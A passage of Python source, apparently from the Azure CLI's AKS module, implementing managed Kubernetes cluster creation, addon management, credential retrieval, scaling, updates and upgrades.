raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
# Attach acr operation will be handled after the cluster is created
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
outbound_type = _set_outbound_type(outbound_type, vnet_subnet_id, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip,
docker_bridge_address, network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
aci_subnet_name,
vnet_subnet_id,
appgw_name,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
enable_sgxquotehelper
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in addon_profiles:
enable_virtual_node = True
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
api_server_access_profile = None
if enable_private_cluster and load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
if api_server_authorized_ip_ranges or enable_private_cluster:
api_server_access_profile = _populate_api_server_access_profile(
api_server_authorized_ip_ranges,
enable_private_cluster=enable_private_cluster
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if not enable_managed_identity and assign_identity:
raise ArgumentUsageError('--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
api_server_access_profile=api_server_access_profile,
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
# Add AAD session key to header.
# If principal_obj is None, we will not add this header, this can happen
# when the cluster enables managed identity. In this case, the header is useless
# and that's OK to not add this header
custom_headers = None
if principal_obj:
custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
need_pull_for_result = (monitoring or
(enable_managed_identity and attach_acr) or
ingress_appgw_addon_enabled or
enable_virtual_node or
need_post_creation_vnet_permission_granting)
if need_pull_for_result:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc))
else:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=custom_headers)
if monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if enable_managed_identity and attach_acr:
if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach acr to it, '
'you can manually grant permission to the identity named <ClUSTER_NAME>-agentpool '
'in MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
_add_virtual_node_role_assignment(cmd, result, vnet_subnet_id)
if need_post_creation_vnet_permission_granting:
if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
result.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
if enable_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
not update_lb_profile and
not attach_acr and
not detach_acr and
not uptime_sla and
api_server_authorized_ip_ranges is None and
not enable_aad and
not update_aad_profile and
not enable_ahub and
not disable_ahub):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--load-balancer-managed-outbound-ip-count" or'
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or'
'"--load-balancer-outbound-ports" or'
'"--load-balancer-idle-timeout" or'
'"--attach-acr" or "--detach-acr" or'
'"--uptime-sla" or'
'"--api-server-authorized-ip-ranges" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub"')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear autoscaler profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
if enable_ahub and disable_ahub:
raise CLIError('Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
_upgrade_single_nodepool_image_version(True, client, resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise ValidationError('The confcom addon is already enabled for this managed cluster.',
recommendation='To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
else:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None,
aci_subnet_name=None,
vnet_subnet_id=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError('"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
